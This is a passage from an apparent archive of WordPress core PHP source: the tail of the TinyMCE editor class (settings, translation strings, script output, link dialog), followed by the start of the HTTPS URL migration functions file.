return self::$mce_locale;
}
/**
* Returns the TinyMCE base URL.
*
* @since 4.8.0
*
* @return string
*/
public static function get_baseurl() {
if ( empty( self::$baseurl ) ) {
self::$baseurl = includes_url( 'js/tinymce' );
}
return self::$baseurl;
}
/**
* Returns the default TinyMCE settings.
* Doesn't include plugins, buttons, editor selector.
*
* @since 4.8.0
*
* @global string $tinymce_version
*
* @return array
*/
private static function default_settings() {
global $tinymce_version;
$shortcut_labels = array();
foreach ( self::get_translation() as $name => $value ) {
if ( is_array( $value ) ) {
$shortcut_labels[ $name ] = $value[1];
}
}
$settings = array(
'theme' => 'modern',
'skin' => 'lightgray',
'language' => self::get_mce_locale(),
'formats' => '{' .
'alignleft: [' .
'{selector: "p,h1,h2,h3,h4,h5,h6,td,th,div,ul,ol,li", styles: {textAlign:"left"}},' .
'{selector: "img,table,dl.wp-caption", classes: "alignleft"}' .
'],' .
'aligncenter: [' .
'{selector: "p,h1,h2,h3,h4,h5,h6,td,th,div,ul,ol,li", styles: {textAlign:"center"}},' .
'{selector: "img,table,dl.wp-caption", classes: "aligncenter"}' .
'],' .
'alignright: [' .
'{selector: "p,h1,h2,h3,h4,h5,h6,td,th,div,ul,ol,li", styles: {textAlign:"right"}},' .
'{selector: "img,table,dl.wp-caption", classes: "alignright"}' .
'],' .
'strikethrough: {inline: "del"}' .
'}',
'relative_urls' => false,
'remove_script_host' => false,
'convert_urls' => false,
'browser_spellcheck' => true,
'fix_list_elements' => true,
'entities' => '38,amp,60,lt,62,gt',
'entity_encoding' => 'raw',
'keep_styles' => false,
'cache_suffix' => 'wp-mce-' . $tinymce_version,
'resize' => 'vertical',
'menubar' => false,
'branding' => false,
// Limit the preview styles in the menu/toolbar.
'preview_styles' => 'font-family font-size font-weight font-style text-decoration text-transform',
'end_container_on_empty_block' => true,
'wpeditimage_html5_captions' => true,
'wp_lang_attr' => get_bloginfo( 'language' ),
'wp_shortcut_labels' => wp_json_encode( $shortcut_labels ),
);
$suffix = SCRIPT_DEBUG ? '' : '.min';
$version = 'ver=' . get_bloginfo( 'version' );
// Default stylesheets.
$settings['content_css'] = includes_url( "css/dashicons$suffix.css?$version" ) . ',' .
includes_url( "js/tinymce/skins/wordpress/wp-content.css?$version" );
return $settings;
}
/**
* @since 4.7.0
*
* @return array
*/
private static function get_translation() {
if ( empty( self::$translation ) ) {
self::$translation = array(
// Default TinyMCE strings.
'New document' => __( 'New document' ),
'Formats' => _x( 'Formats', 'TinyMCE' ),
'Headings' => _x( 'Headings', 'TinyMCE' ),
'Heading 1' => array( __( 'Heading 1' ), 'access1' ),
'Heading 2' => array( __( 'Heading 2' ), 'access2' ),
'Heading 3' => array( __( 'Heading 3' ), 'access3' ),
'Heading 4' => array( __( 'Heading 4' ), 'access4' ),
'Heading 5' => array( __( 'Heading 5' ), 'access5' ),
'Heading 6' => array( __( 'Heading 6' ), 'access6' ),
/* translators: Block tags. */
'Blocks' => _x( 'Blocks', 'TinyMCE' ),
'Paragraph' => array( __( 'Paragraph' ), 'access7' ),
'Blockquote' => array( __( 'Blockquote' ), 'accessQ' ),
'Div' => _x( 'Div', 'HTML tag' ),
'Pre' => _x( 'Pre', 'HTML tag' ),
'Preformatted' => _x( 'Preformatted', 'HTML tag' ),
'Address' => _x( 'Address', 'HTML tag' ),
'Inline' => _x( 'Inline', 'HTML elements' ),
'Underline' => array( __( 'Underline' ), 'metaU' ),
'Strikethrough' => array( __( 'Strikethrough' ), 'accessD' ),
'Subscript' => __( 'Subscript' ),
'Superscript' => __( 'Superscript' ),
'Clear formatting' => __( 'Clear formatting' ),
'Bold' => array( __( 'Bold' ), 'metaB' ),
'Italic' => array( __( 'Italic' ), 'metaI' ),
'Code' => array( __( 'Code' ), 'accessX' ),
'Source code' => __( 'Source code' ),
'Font Family' => __( 'Font Family' ),
'Font Sizes' => __( 'Font Sizes' ),
'Align center' => array( __( 'Align center' ), 'accessC' ),
'Align right' => array( __( 'Align right' ), 'accessR' ),
'Align left' => array( __( 'Align left' ), 'accessL' ),
'Justify' => array( __( 'Justify' ), 'accessJ' ),
'Increase indent' => __( 'Increase indent' ),
'Decrease indent' => __( 'Decrease indent' ),
'Cut' => array( __( 'Cut' ), 'metaX' ),
'Copy' => array( __( 'Copy' ), 'metaC' ),
'Paste' => array( __( 'Paste' ), 'metaV' ),
'Select all' => array( __( 'Select all' ), 'metaA' ),
'Undo' => array( __( 'Undo' ), 'metaZ' ),
'Redo' => array( __( 'Redo' ), 'metaY' ),
'Ok' => __( 'OK' ),
'Cancel' => __( 'Cancel' ),
'Close' => __( 'Close' ),
'Visual aids' => __( 'Visual aids' ),
'Bullet list' => array( __( 'Bulleted list' ), 'accessU' ),
'Numbered list' => array( __( 'Numbered list' ), 'accessO' ),
'Square' => _x( 'Square', 'list style' ),
'Default' => _x( 'Default', 'list style' ),
'Circle' => _x( 'Circle', 'list style' ),
'Disc' => _x( 'Disc', 'list style' ),
'Lower Greek' => _x( 'Lower Greek', 'list style' ),
'Lower Alpha' => _x( 'Lower Alpha', 'list style' ),
'Upper Alpha' => _x( 'Upper Alpha', 'list style' ),
'Upper Roman' => _x( 'Upper Roman', 'list style' ),
'Lower Roman' => _x( 'Lower Roman', 'list style' ),
// Anchor plugin.
'Name' => _x( 'Name', 'Name of link anchor (TinyMCE)' ),
'Anchor' => _x( 'Anchor', 'Link anchor (TinyMCE)' ),
'Anchors' => _x( 'Anchors', 'Link anchors (TinyMCE)' ),
'Id should start with a letter, followed only by letters, numbers, dashes, dots, colons or underscores.' =>
__( 'Id should start with a letter, followed only by letters, numbers, dashes, dots, colons or underscores.' ),
'Id' => _x( 'Id', 'Id for link anchor (TinyMCE)' ),
// Fullpage plugin.
'Document properties' => __( 'Document properties' ),
'Robots' => __( 'Robots' ),
'Title' => __( 'Title' ),
'Keywords' => __( 'Keywords' ),
'Encoding' => __( 'Encoding' ),
'Description' => __( 'Description' ),
'Author' => __( 'Author' ),
// Media, image plugins.
'Image' => __( 'Image' ),
'Insert/edit image' => array( __( 'Insert/edit image' ), 'accessM' ),
'General' => __( 'General' ),
'Advanced' => __( 'Advanced' ),
'Source' => __( 'Source' ),
'Border' => __( 'Border' ),
'Constrain proportions' => __( 'Constrain proportions' ),
'Vertical space' => __( 'Vertical space' ),
'Image description' => __( 'Image description' ),
'Style' => __( 'Style' ),
'Dimensions' => __( 'Dimensions' ),
'Insert image' => __( 'Insert image' ),
'Date/time' => __( 'Date/time' ),
'Insert date/time' => __( 'Insert date/time' ),
'Table of Contents' => __( 'Table of Contents' ),
'Insert/Edit code sample' => __( 'Insert/edit code sample' ),
'Language' => __( 'Language' ),
'Media' => __( 'Media' ),
'Insert/edit media' => __( 'Insert/edit media' ),
'Poster' => __( 'Poster' ),
'Alternative source' => __( 'Alternative source' ),
'Paste your embed code below:' => __( 'Paste your embed code below:' ),
'Insert video' => __( 'Insert video' ),
'Embed' => __( 'Embed' ),
// Each of these have a corresponding plugin.
'Special character' => __( 'Special character' ),
'Right to left' => _x( 'Right to left', 'editor button' ),
'Left to right' => _x( 'Left to right', 'editor button' ),
'Emoticons' => __( 'Emoticons' ),
'Nonbreaking space' => __( 'Nonbreaking space' ),
'Page break' => __( 'Page break' ),
'Paste as text' => __( 'Paste as text' ),
'Preview' => __( 'Preview' ),
'Print' => __( 'Print' ),
'Save' => __( 'Save' ),
'Fullscreen' => __( 'Fullscreen' ),
'Horizontal line' => __( 'Horizontal line' ),
'Horizontal space' => __( 'Horizontal space' ),
'Restore last draft' => __( 'Restore last draft' ),
'Insert/edit link' => array( __( 'Insert/edit link' ), 'metaK' ),
'Remove link' => array( __( 'Remove link' ), 'accessS' ),
// Link plugin.
'Link' => __( 'Link' ),
'Insert link' => __( 'Insert link' ),
'Target' => __( 'Target' ),
'New window' => __( 'New window' ),
'Text to display' => __( 'Text to display' ),
'Url' => __( 'URL' ),
'The URL you entered seems to be an email address. Do you want to add the required mailto: prefix?' =>
__( 'The URL you entered seems to be an email address. Do you want to add the required mailto: prefix?' ),
'The URL you entered seems to be an external link. Do you want to add the required http:// prefix?' =>
__( 'The URL you entered seems to be an external link. Do you want to add the required http:// prefix?' ),
'Color' => __( 'Color' ),
'Custom color' => __( 'Custom color' ),
'Custom...' => _x( 'Custom...', 'label for custom color' ), // No ellipsis.
'No color' => __( 'No color' ),
'R' => _x( 'R', 'Short for red in RGB' ),
'G' => _x( 'G', 'Short for green in RGB' ),
'B' => _x( 'B', 'Short for blue in RGB' ),
// Spelling, search/replace plugins.
'Could not find the specified string.' => __( 'Could not find the specified string.' ),
'Replace' => _x( 'Replace', 'find/replace' ),
'Next' => _x( 'Next', 'find/replace' ),
/* translators: Previous. */
'Prev' => _x( 'Prev', 'find/replace' ),
'Whole words' => _x( 'Whole words', 'find/replace' ),
'Find and replace' => __( 'Find and replace' ),
'Replace with' => _x( 'Replace with', 'find/replace' ),
'Find' => _x( 'Find', 'find/replace' ),
'Replace all' => _x( 'Replace all', 'find/replace' ),
'Match case' => __( 'Match case' ),
'Spellcheck' => __( 'Check Spelling' ),
'Finish' => _x( 'Finish', 'spellcheck' ),
'Ignore all' => _x( 'Ignore all', 'spellcheck' ),
'Ignore' => _x( 'Ignore', 'spellcheck' ),
'Add to Dictionary' => __( 'Add to Dictionary' ),
// TinyMCE tables.
'Insert table' => __( 'Insert table' ),
'Delete table' => __( 'Delete table' ),
'Table properties' => __( 'Table properties' ),
'Row properties' => __( 'Table row properties' ),
'Cell properties' => __( 'Table cell properties' ),
'Border color' => __( 'Border color' ),
'Row' => __( 'Row' ),
'Rows' => __( 'Rows' ),
'Column' => __( 'Column' ),
'Cols' => __( 'Columns' ),
'Cell' => _x( 'Cell', 'table cell' ),
'Header cell' => __( 'Header cell' ),
'Header' => _x( 'Header', 'table header' ),
'Body' => _x( 'Body', 'table body' ),
'Footer' => _x( 'Footer', 'table footer' ),
'Insert row before' => __( 'Insert row before' ),
'Insert row after' => __( 'Insert row after' ),
'Insert column before' => __( 'Insert column before' ),
'Insert column after' => __( 'Insert column after' ),
'Paste row before' => __( 'Paste table row before' ),
'Paste row after' => __( 'Paste table row after' ),
'Delete row' => __( 'Delete row' ),
'Delete column' => __( 'Delete column' ),
'Cut row' => __( 'Cut table row' ),
'Copy row' => __( 'Copy table row' ),
'Merge cells' => __( 'Merge table cells' ),
'Split cell' => __( 'Split table cell' ),
'Height' => __( 'Height' ),
'Width' => __( 'Width' ),
'Caption' => __( 'Caption' ),
'Alignment' => __( 'Alignment' ),
'H Align' => _x( 'H Align', 'horizontal table cell alignment' ),
'Left' => __( 'Left' ),
'Center' => __( 'Center' ),
'Right' => __( 'Right' ),
'None' => _x( 'None', 'table cell alignment attribute' ),
'V Align' => _x( 'V Align', 'vertical table cell alignment' ),
'Top' => __( 'Top' ),
'Middle' => __( 'Middle' ),
'Bottom' => __( 'Bottom' ),
'Row group' => __( 'Row group' ),
'Column group' => __( 'Column group' ),
'Row type' => __( 'Row type' ),
'Cell type' => __( 'Cell type' ),
'Cell padding' => __( 'Cell padding' ),
'Cell spacing' => __( 'Cell spacing' ),
'Scope' => _x( 'Scope', 'table cell scope attribute' ),
'Insert template' => _x( 'Insert template', 'TinyMCE' ),
'Templates' => _x( 'Templates', 'TinyMCE' ),
'Background color' => __( 'Background color' ),
'Text color' => __( 'Text color' ),
'Show blocks' => _x( 'Show blocks', 'editor button' ),
'Show invisible characters' => __( 'Show invisible characters' ),
/* translators: Word count. */
'Words: {0}' => sprintf( __( 'Words: %s' ), '{0}' ),
'Paste is now in plain text mode. Contents will now be pasted as plain text until you toggle this option off.' =>
__( 'Paste is now in plain text mode. Contents will now be pasted as plain text until you toggle this option off.' ) . "\n\n" .
__( 'If you are looking to paste rich content from Microsoft Word, try turning this option off. The editor will clean up text pasted from Word automatically.' ),
'Rich Text Area. Press ALT-F9 for menu. Press ALT-F10 for toolbar. Press ALT-0 for help' =>
__( 'Rich Text Area. Press Alt-Shift-H for help.' ),
'Rich Text Area. Press Control-Option-H for help.' => __( 'Rich Text Area. Press Control-Option-H for help.' ),
'You have unsaved changes are you sure you want to navigate away?' =>
__( 'The changes you made will be lost if you navigate away from this page.' ),
'Your browser doesn\'t support direct access to the clipboard. Please use the Ctrl+X/C/V keyboard shortcuts instead.' =>
__( 'Your browser does not support direct access to the clipboard. Please use keyboard shortcuts or your browser’s edit menu instead.' ),
// TinyMCE menus.
'Insert' => _x( 'Insert', 'TinyMCE menu' ),
'File' => _x( 'File', 'TinyMCE menu' ),
'Edit' => _x( 'Edit', 'TinyMCE menu' ),
'Tools' => _x( 'Tools', 'TinyMCE menu' ),
'View' => _x( 'View', 'TinyMCE menu' ),
'Table' => _x( 'Table', 'TinyMCE menu' ),
'Format' => _x( 'Format', 'TinyMCE menu' ),
// WordPress strings.
'Toolbar Toggle' => array( __( 'Toolbar Toggle' ), 'accessZ' ),
'Insert Read More tag' => array( __( 'Insert Read More tag' ), 'accessT' ),
'Insert Page Break tag' => array( __( 'Insert Page Break tag' ), 'accessP' ),
'Read more...' => __( 'Read more...' ), // Title on the placeholder inside the editor (no ellipsis).
'Distraction-free writing mode' => array( __( 'Distraction-free writing mode' ), 'accessW' ),
'No alignment' => __( 'No alignment' ), // Tooltip for the 'alignnone' button in the image toolbar.
'Remove' => __( 'Remove' ), // Tooltip for the 'remove' button in the image toolbar.
'Edit|button' => __( 'Edit' ), // Tooltip for the 'edit' button in the image toolbar.
'Paste URL or type to search' => __( 'Paste URL or type to search' ), // Placeholder for the inline link dialog.
'Apply' => __( 'Apply' ), // Tooltip for the 'apply' button in the inline link dialog.
'Link options' => __( 'Link options' ), // Tooltip for the 'link options' button in the inline link dialog.
'Visual' => _x( 'Visual', 'Name for the Visual editor tab' ), // Editor switch tab label.
'Code|tab' => _x( 'Code', 'Name for the Code editor tab (formerly Text)' ), // Editor switch tab label.
'Add Media' => array( __( 'Add Media' ), 'accessM' ), // Tooltip for the 'Add Media' button in the block editor Classic block.
// Shortcuts help modal.
'Keyboard Shortcuts' => array( __( 'Keyboard Shortcuts' ), 'accessH' ),
'Classic Block Keyboard Shortcuts' => __( 'Classic Block Keyboard Shortcuts' ),
'Default shortcuts,' => __( 'Default shortcuts,' ),
'Additional shortcuts,' => __( 'Additional shortcuts,' ),
'Focus shortcuts:' => __( 'Focus shortcuts:' ),
'Inline toolbar (when an image, link or preview is selected)' => __( 'Inline toolbar (when an image, link or preview is selected)' ),
'Editor menu (when enabled)' => __( 'Editor menu (when enabled)' ),
'Editor toolbar' => __( 'Editor toolbar' ),
'Elements path' => __( 'Elements path' ),
'Ctrl + Alt + letter:' => __( 'Ctrl + Alt + letter:' ),
'Shift + Alt + letter:' => __( 'Shift + Alt + letter:' ),
'Cmd + letter:' => __( 'Cmd + letter:' ),
'Ctrl + letter:' => __( 'Ctrl + letter:' ),
'Letter' => __( 'Letter' ),
'Action' => __( 'Action' ),
'Warning: the link has been inserted but may have errors. Please test it.' => __( 'Warning: the link has been inserted but may have errors. Please test it.' ),
'To move focus to other buttons use Tab or the arrow keys. To return focus to the editor press Escape or use one of the buttons.' =>
__( 'To move focus to other buttons use Tab or the arrow keys. To return focus to the editor press Escape or use one of the buttons.' ),
'When starting a new paragraph with one of these formatting shortcuts followed by a space, the formatting will be applied automatically. Press Backspace or Escape to undo.' =>
__( 'When starting a new paragraph with one of these formatting shortcuts followed by a space, the formatting will be applied automatically. Press Backspace or Escape to undo.' ),
'The following formatting shortcuts are replaced when pressing Enter. Press Escape or the Undo button to undo.' =>
__( 'The following formatting shortcuts are replaced when pressing Enter. Press Escape or the Undo button to undo.' ),
'The next group of formatting shortcuts are applied as you type or when you insert them around plain text in the same paragraph. Press Escape or the Undo button to undo.' =>
__( 'The next group of formatting shortcuts are applied as you type or when you insert them around plain text in the same paragraph. Press Escape or the Undo button to undo.' ),
);
}
/*
Imagetools plugin (not included):
'Edit image' => __( 'Edit image' ),
'Image options' => __( 'Image options' ),
'Back' => __( 'Back' ),
'Invert' => __( 'Invert' ),
'Flip horizontally' => __( 'Flip horizontal' ),
'Flip vertically' => __( 'Flip vertical' ),
'Crop' => __( 'Crop' ),
'Orientation' => __( 'Orientation' ),
'Resize' => __( 'Resize' ),
'Rotate clockwise' => __( 'Rotate right' ),
'Rotate counterclockwise' => __( 'Rotate left' ),
'Sharpen' => __( 'Sharpen' ),
'Brightness' => __( 'Brightness' ),
'Color levels' => __( 'Color levels' ),
'Contrast' => __( 'Contrast' ),
'Gamma' => __( 'Gamma' ),
'Zoom in' => __( 'Zoom in' ),
'Zoom out' => __( 'Zoom out' ),
*/
return self::$translation;
}
/**
* Translates the default TinyMCE strings and returns them as JSON encoded object ready to be loaded with tinymce.addI18n(),
* or as JS snippet that should run after tinymce.js is loaded.
*
* @since 3.9.0
*
* @param string $mce_locale The locale used for the editor.
* @param bool $json_only Optional. Whether to include the JavaScript calls to tinymce.addI18n() and
* tinymce.ScriptLoader.markDone(). Default false.
* @return string Translation object, JSON encoded.
*/
public static function wp_mce_translation( $mce_locale = '', $json_only = false ) {
if ( ! $mce_locale ) {
$mce_locale = self::get_mce_locale();
}
$mce_translation = self::get_translation();
foreach ( $mce_translation as $name => $value ) {
if ( is_array( $value ) ) {
$mce_translation[ $name ] = $value[0];
}
}
/**
* Filters translated strings prepared for TinyMCE.
*
* @since 3.9.0
*
* @param array $mce_translation Key/value pairs of strings.
* @param string $mce_locale Locale.
*/
$mce_translation = apply_filters( 'wp_mce_translation', $mce_translation, $mce_locale );
foreach ( $mce_translation as $key => $value ) {
// Remove strings that are not translated.
if ( $key === $value ) {
unset( $mce_translation[ $key ] );
continue;
}
if ( str_contains( $value, '&' ) ) {
$mce_translation[ $key ] = html_entity_decode( $value, ENT_QUOTES, 'UTF-8' );
}
}
// Set direction.
if ( is_rtl() ) {
$mce_translation['_dir'] = 'rtl';
}
if ( $json_only ) {
return wp_json_encode( $mce_translation );
}
$baseurl = self::get_baseurl();
return "tinymce.addI18n( '$mce_locale', " . wp_json_encode( $mce_translation ) . ");\n" .
"tinymce.ScriptLoader.markDone( '$baseurl/langs/$mce_locale.js' );\n";
}
/**
* Force uncompressed TinyMCE when a custom theme has been defined.
*
* The compressed TinyMCE file cannot deal with custom themes, so this makes
* sure that WordPress uses the uncompressed TinyMCE file if a theme is defined.
* Even if the website is running on a production environment.
*
* @since 5.0.0
*/
public static function force_uncompressed_tinymce() {
$has_custom_theme = false;
foreach ( self::$mce_settings as $init ) {
if ( ! empty( $init['theme_url'] ) ) {
$has_custom_theme = true;
break;
}
}
if ( ! $has_custom_theme ) {
return;
}
$wp_scripts = wp_scripts();
$wp_scripts->remove( 'wp-tinymce' );
wp_register_tinymce_scripts( $wp_scripts, true );
}
/**
* Print (output) the main TinyMCE scripts.
*
* @since 4.8.0
*
* @global bool $concatenate_scripts
*/
public static function print_tinymce_scripts() {
global $concatenate_scripts;
if ( self::$tinymce_scripts_printed ) {
return;
}
self::$tinymce_scripts_printed = true;
if ( ! isset( $concatenate_scripts ) ) {
script_concat_settings();
}
wp_print_scripts( array( 'wp-tinymce' ) );
echo "<script type='text/javascript'>\n" . self::wp_mce_translation() . "</script>\n";
}
/**
* Print (output) the TinyMCE configuration and initialization scripts.
*
* @since 3.3.0
*
* @global string $tinymce_version
*/
public static function editor_js() {
global $tinymce_version;
$tmce_on = ! empty( self::$mce_settings );
$mce_init = '';
$qt_init = '';
if ( $tmce_on ) {
foreach ( self::$mce_settings as $editor_id => $init ) {
$options = self::_parse_init( $init );
$mce_init .= "'$editor_id':{$options},";
}
$mce_init = '{' . trim( $mce_init, ',' ) . '}';
} else {
$mce_init = '{}';
}
if ( ! empty( self::$qt_settings ) ) {
foreach ( self::$qt_settings as $editor_id => $init ) {
$options = self::_parse_init( $init );
$qt_init .= "'$editor_id':{$options},";
}
$qt_init = '{' . trim( $qt_init, ',' ) . '}';
} else {
$qt_init = '{}';
}
$ref = array(
'plugins' => implode( ',', self::$plugins ),
'theme' => 'modern',
'language' => self::$mce_locale,
);
$suffix = SCRIPT_DEBUG ? '' : '.min';
$baseurl = self::get_baseurl();
$version = 'ver=' . $tinymce_version;
/**
* Fires immediately before the TinyMCE settings are printed.
*
* @since 3.2.0
*
* @param array $mce_settings TinyMCE settings array.
*/
do_action( 'before_wp_tiny_mce', self::$mce_settings );
?>
<script type="text/javascript">
tinyMCEPreInit = {
baseURL: "<?php echo $baseurl; ?>",
suffix: "<?php echo $suffix; ?>",
<?php
if ( self::$drag_drop_upload ) {
echo 'dragDropUpload: true,';
}
?>
mceInit: <?php echo $mce_init; ?>,
qtInit: <?php echo $qt_init; ?>,
ref: <?php echo self::_parse_init( $ref ); ?>,
load_ext: function(url,lang){var sl=tinymce.ScriptLoader;sl.markDone(url+'/langs/'+lang+'.js');sl.markDone(url+'/langs/'+lang+'_dlg.js');}
};
</script>
<?php
if ( $tmce_on ) {
self::print_tinymce_scripts();
if ( self::$ext_plugins ) {
// Load the old-format English strings to prevent unsightly labels in old style popups.
echo "<script type='text/javascript' src='{$baseurl}/langs/wp-langs-en.js?$version'></script>\n";
}
}
/**
* Fires after tinymce.js is loaded, but before any TinyMCE editor
* instances are created.
*
* @since 3.9.0
*
* @param array $mce_settings TinyMCE settings array.
*/
do_action( 'wp_tiny_mce_init', self::$mce_settings );
?>
<script type="text/javascript">
<?php
if ( self::$ext_plugins ) {
echo self::$ext_plugins . "\n";
}
if ( ! is_admin() ) {
echo 'var ajaxurl = "' . admin_url( 'admin-ajax.php', 'relative' ) . '";';
}
?>
( function() {
var initialized = [];
var initialize = function() {
var init, id, inPostbox, $wrap;
var readyState = document.readyState;
if ( readyState !== 'complete' && readyState !== 'interactive' ) {
return;
}
for ( id in tinyMCEPreInit.mceInit ) {
if ( initialized.indexOf( id ) > -1 ) {
continue;
}
init = tinyMCEPreInit.mceInit[id];
$wrap = tinymce.$( '#wp-' + id + '-wrap' );
inPostbox = $wrap.parents( '.postbox' ).length > 0;
if (
! init.wp_skip_init &&
( $wrap.hasClass( 'tmce-active' ) || ! tinyMCEPreInit.qtInit.hasOwnProperty( id ) ) &&
( readyState === 'complete' || ( ! inPostbox && readyState === 'interactive' ) )
) {
tinymce.init( init );
initialized.push( id );
if ( ! window.wpActiveEditor ) {
window.wpActiveEditor = id;
}
}
}
}
if ( typeof tinymce !== 'undefined' ) {
if ( tinymce.Env.ie && tinymce.Env.ie < 11 ) {
tinymce.$( '.wp-editor-wrap ' ).removeClass( 'tmce-active' ).addClass( 'html-active' );
} else {
if ( document.readyState === 'complete' ) {
initialize();
} else {
document.addEventListener( 'readystatechange', initialize );
}
}
}
if ( typeof quicktags !== 'undefined' ) {
for ( id in tinyMCEPreInit.qtInit ) {
quicktags( tinyMCEPreInit.qtInit[id] );
if ( ! window.wpActiveEditor ) {
window.wpActiveEditor = id;
}
}
}
}());
</script>
<?php
if ( in_array( 'wplink', self::$plugins, true ) || in_array( 'link', self::$qt_buttons, true ) ) {
self::wp_link_dialog();
}
/**
* Fires after any core TinyMCE editor instances are created.
*
* @since 3.2.0
*
* @param array $mce_settings TinyMCE settings array.
*/
do_action( 'after_wp_tiny_mce', self::$mce_settings );
}
/**
* Outputs the HTML for distraction-free writing mode.
*
* @since 3.2.0
* @deprecated 4.3.0
*/
public static function wp_fullscreen_html() {
_deprecated_function( __FUNCTION__, '4.3.0' );
}
/**
* Performs post queries for internal linking.
*
* @since 3.1.0
*
* @param array $args {
* Optional. Array of link query arguments.
*
* @type int $pagenum Page number. Default 1.
* @type string $s Search keywords.
* }
* @return array|false $results {
* An array of associative arrays of query results, false if there are none.
*
* @type array ...$0 {
* @type int $ID Post ID.
* @type string $title The trimmed, escaped post title.
* @type string $permalink Post permalink.
* @type string $info A 'Y/m/d'-formatted date for 'post' post type,
* the 'singular_name' post type label otherwise.
* }
* }
*/
public static function wp_link_query( $args = array() ) {
$pts = get_post_types( array( 'public' => true ), 'objects' );
$pt_names = array_keys( $pts );
$query = array(
'post_type' => $pt_names,
'suppress_filters' => true,
'update_post_term_cache' => false,
'update_post_meta_cache' => false,
'post_status' => 'publish',
'posts_per_page' => 20,
);
$args['pagenum'] = isset( $args['pagenum'] ) ? absint( $args['pagenum'] ) : 1;
if ( isset( $args['s'] ) ) {
$query['s'] = $args['s'];
}
$query['offset'] = $args['pagenum'] > 1 ? $query['posts_per_page'] * ( $args['pagenum'] - 1 ) : 0;
/**
* Filters the link query arguments.
*
* Allows modification of the link query arguments before querying.
*
* @see WP_Query for a full list of arguments
*
* @since 3.7.0
*
* @param array $query An array of WP_Query arguments.
*/
$query = apply_filters( 'wp_link_query_args', $query );
// Do main query.
$get_posts = new WP_Query();
$posts = $get_posts->query( $query );
// Build results.
$results = array();
foreach ( $posts as $post ) {
if ( 'post' === $post->post_type ) {
$info = mysql2date( __( 'Y/m/d' ), $post->post_date );
} else {
$info = $pts[ $post->post_type ]->labels->singular_name;
}
$results[] = array(
'ID' => $post->ID,
'title' => trim( esc_html( strip_tags( get_the_title( $post ) ) ) ),
'permalink' => get_permalink( $post->ID ),
'info' => $info,
);
}
/**
* Filters the link query results.
*
* Allows modification of the returned link query results.
*
* @since 3.7.0
*
* @see 'wp_link_query_args' filter
*
* @param array $results {
* An array of associative arrays of query results.
*
* @type array ...$0 {
* @type int $ID Post ID.
* @type string $title The trimmed, escaped post title.
* @type string $permalink Post permalink.
* @type string $info A 'Y/m/d'-formatted date for 'post' post type,
* the 'singular_name' post type label otherwise.
* }
* }
* @param array $query An array of WP_Query arguments.
*/
$results = apply_filters( 'wp_link_query', $results, $query );
return ! empty( $results ) ? $results : false;
}
/**
* Dialog for internal linking.
*
* @since 3.1.0
*/
public static function wp_link_dialog() {
// Run once.
if ( self::$link_dialog_printed ) {
return;
}
self::$link_dialog_printed = true;
// `display: none` is required here, see #WP27605.
?>
<div id="wp-link-backdrop" style="display: none"></div>
<div id="wp-link-wrap" class="wp-core-ui" style="display: none" role="dialog" aria-modal="true" aria-labelledby="link-modal-title">
<form id="wp-link" tabindex="-1">
<?php wp_nonce_field( 'internal-linking', '_ajax_linking_nonce', false ); ?>
<h1 id="link-modal-title"><?php _e( 'Insert/edit link' ); ?></h1>
<button type="button" id="wp-link-close"><span class="screen-reader-text">
<?php
/* translators: Hidden accessibility text. */
_e( 'Close' );
?>
</span></button>
<div id="link-selector">
<div id="link-options">
<p class="howto" id="wplink-enter-url"><?php _e( 'Enter the destination URL' ); ?></p>
<div>
<label><span><?php _e( 'URL' ); ?></span>
<input id="wp-link-url" type="text" aria-describedby="wplink-enter-url" /></label>
</div>
<div class="wp-link-text-field">
<label><span><?php _e( 'Link Text' ); ?></span>
<input id="wp-link-text" type="text" /></label>
</div>
<div class="link-target">
<label><span></span>
<input type="checkbox" id="wp-link-target" /> <?php _e( 'Open link in a new tab' ); ?></label>
</div>
</div>
<p class="howto" id="wplink-link-existing-content"><?php _e( 'Or link to existing content' ); ?></p>
<div id="search-panel">
<div class="link-search-wrapper">
<label>
<span class="search-label"><?php _e( 'Search' ); ?></span>
<input type="search" id="wp-link-search" class="link-search-field" autocomplete="off" aria-describedby="wplink-link-existing-content" />
<span class="spinner"></span>
</label>
</div>
<div id="search-results" class="query-results" tabindex="0">
<ul></ul>
<div class="river-waiting">
<span class="spinner"></span>
</div>
</div>
<div id="most-recent-results" class="query-results" tabindex="0">
<div class="query-notice" id="query-notice-message">
<em class="query-notice-default"><?php _e( 'No search term specified. Showing recent items.' ); ?></em>
<em class="query-notice-hint screen-reader-text">
<?php
/* translators: Hidden accessibility text. */
_e( 'Search or use up and down arrow keys to select an item.' );
?>
</em>
</div>
<ul></ul>
<div class="river-waiting">
<span class="spinner"></span>
</div>
</div>
</div>
</div>
<div class="submitbox">
<div id="wp-link-cancel">
<button type="button" class="button"><?php _e( 'Cancel' ); ?></button>
</div>
<div id="wp-link-update">
<input type="submit" value="<?php esc_attr_e( 'Add Link' ); ?>" class="button button-primary" id="wp-link-submit" name="wp-link-submit">
</div>
</div>
</form>
</div>
<?php
}
}
https-migration-20260605172803-20260621212810.php 0000666 00000011205 15224151220 0013350 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
